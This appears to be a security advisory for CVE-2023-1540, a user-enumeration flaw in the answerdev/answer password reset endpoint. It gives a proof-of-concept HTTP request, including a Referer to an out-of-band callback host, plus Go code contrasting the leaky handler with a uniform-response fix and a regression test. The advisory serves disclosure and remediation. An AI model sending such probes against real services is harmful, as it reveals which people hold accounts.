Headline
CVE-2023-1540: Observable Response Discrepancy in Password Reset Functionality in answer
Observable Response Discrepancy in GitHub repository answerdev/answer prior to 1.0.6.
Description
The password reset functionality leaks information about user accounts. When an email address that does not belong to an account is submitted, the application responds that the account could not be found. When the address belongs to a valid account, the application responds with the reason “base.success” (visible when the response is intercepted), or, in the browser, with a message that if an account with that name is identified it will receive an email. Because the two cases produce different responses, the endpoint acts as an oracle for account existence.
Proof of Concept
POST /answer/api/v1/user/password/reset HTTP/1.1
Host: 192.168.1.66:9080
Content-Length: 90
Accept-Language: en_US
Authorization:
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 [email protected]
Content-Type: application/json
Accept: */*
Origin: http://192.168.1.66:9080
Referer: http://egypue1ge0basdkhsivl093qmhsjref3.oastify.com/ref
Accept-Encoding: gzip, deflate
Connection: close
Cache-Control: no-transform
{"e_mail":"[email protected]","captcha_code":"4a2u","captcha_id":"EmC1gF0NkgvUvCdHAu7z"}
Impact
An attacker can enumerate valid user email addresses, which increases the application’s attack surface.
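The following Go example is added here to illustrate the discrepancy described above and the usual remediation; it is not code from the answerdev/answer project. It contrasts a hypothetical handler that reports "user not found" for unknown addresses with one that returns an identical status and body either way, and includes a helper that a regression test can use to confirm the two cases are indistinguishable. The user store and the mail outbox are constructed stand-ins.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Constructed user store and mail outbox standing in for the real database/mailer.
var knownUsers = map[string]bool{"alice@example.com": true}
var mailQueued []string
type resetReq struct {
	Email string `json:"e_mail"`
}

// exists decodes a PoC-shaped JSON body and looks the address up.
func exists(r *http.Request) (string, bool) {
	var req resetReq
	_ = json.NewDecoder(r.Body).Decode(&req) // undecodable body behaves like an unknown address
	email := strings.ToLower(req.Email)
	return email, knownUsers[email]
}

// leakyReset mirrors the reported behaviour (hypothetical handler): status and
// message reveal whether the address is registered.
func leakyReset(w http.ResponseWriter, r *http.Request) {
	email, ok := exists(r)
	if !ok {
		http.Error(w, `{"msg":"user not found"}`, http.StatusBadRequest)
		return
	}
	mailQueued = append(mailQueued, email)
	fmt.Fprint(w, `{"msg":"base.success"}`)
}

// uniformReset is the fixed pattern: the reply is identical either way and only
// the invisible side effect (queuing the mail) depends on the lookup.
func uniformReset(w http.ResponseWriter, r *http.Request) {
	if email, ok := exists(r); ok {
		mailQueued = append(mailQueued, email)
	}
	fmt.Fprint(w, `{"msg":"If an account with that address exists, it will receive an email"}`)
}

// respond drives a handler with a PoC-shaped body and returns status and body,
// so a test can assert that known and unknown addresses are indistinguishable.
func respond(h http.HandlerFunc, email string) (int, string) {
	rr := httptest.NewRecorder()
	body := strings.NewReader(fmt.Sprintf(`{"e_mail":%q}`, email))
	h(rr, httptest.NewRequest(http.MethodPost, "/answer/api/v1/user/password/reset", body))
	return rr.Code, strings.TrimSpace(rr.Body.String())
}
```

A defender can keep the `respond` comparison as a permanent regression test so that any future change to the handler that reintroduces a distinguishable response fails the build.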
Related news
GHSA-6x5v-cxpp-pc5x: Answer has Observable Response Discrepancy